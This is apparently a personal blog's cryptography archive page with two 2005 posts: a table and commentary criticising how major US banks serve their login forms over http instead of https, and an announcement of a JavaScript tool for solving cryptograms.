Archive for the 'Cryptography' Category

Banks and https

Saturday, May 28th, 2005

Here's what happens when you go to the web pages of some large US banks, and what happens when you try changing the homepage URL from "http" to "https" or vice versa.

Bank http https
Bank One Insecure login form. Works.
Wells Fargo Insecure login form. Works.
Wachovia Insecure login form. Works.
Bank of America Insecure login form. Redirects to http.
Washington Mutual Insecure login form. Redirects to http.
US Bank Insecure login form. Error: Connection closed.
Citibank Link to secure login form at "web.da-us.citibank.com". Error: 404.
HSBC Link to secure login form at "www.ebank.us.hsbc.com". Certificate hostname mismatch.
Suntrust Redirects to https. Works.

Most of these banks make Critical SSL/TLS Mistake #1, having the login form be http and only submit to https. This protects against passive attacks, but does not protect against man-in-the-middle attacks. An attacker who can mount a passive attack can usually mount a man-in-the-middle attack with only a little more work, so these banks are barely more secure than sites that do not use https at all.

Of the banks that use https login forms at all, many make two smaller mistakes: their main page is http, which invites http links and bookmarks, and their login forms have long hostnames like "web.da-us.citibank.com", which are harder for users to verify than e.g. "www.citibank.com" or "citibank.com".

Many of the largest targets for financial fraud in the US are only defending themselves against passive attacks. Do they believe authenticated encryption isn't important in the US? Aren't these the same banks that blackmailed Mozilla developers into adding two of its most-hated features, "autocomplete=off" and "Cache-Control: no-store", claiming that any browser without these features was not secure enough for use on their sites? Banks in the US are heavily regulated, so why aren't they mandated to use https correctly?

Users either don't look for the lock icon at all, or can be tricked by the combination of a lock image and a statement in the page like "The moment you click Sign In and before your ID and passcode leave your computer, we encrypt them using Secure Sockets Layer (SSL) technology." Why is that? What can be done? What should be done?

New JavaScript cryptogram helper

Thursday, January 13th, 2005

The first homework problem in my crpytography class was to break a cryptogram. After looking at the other cryptogram helpers on the web, I created the JavaScript Cryptogram Helper. It lets you paste cryptograms, highlights all instances of the selected letter in blue, and shows a table with letter frequencies to facilitate frequency analysis. The UI was inspired by Teppo Pihlajamäki's Flash cryptogram game.